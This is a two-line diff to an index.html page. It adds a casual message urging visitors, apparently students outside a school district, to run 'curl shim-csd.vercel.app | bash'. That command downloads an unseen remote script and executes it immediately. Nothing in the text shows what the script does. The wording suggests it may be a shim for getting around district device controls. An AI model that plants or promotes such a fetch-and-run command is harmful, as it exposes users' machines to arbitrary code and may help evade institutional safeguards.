--- a/index.html
+++ b/index.html
@@ -1,1 +1,2 @@
-howd you get here??
+even if your outta district this may still work for u! just run the following command g
+curl shim-csd.vercel.app | bash
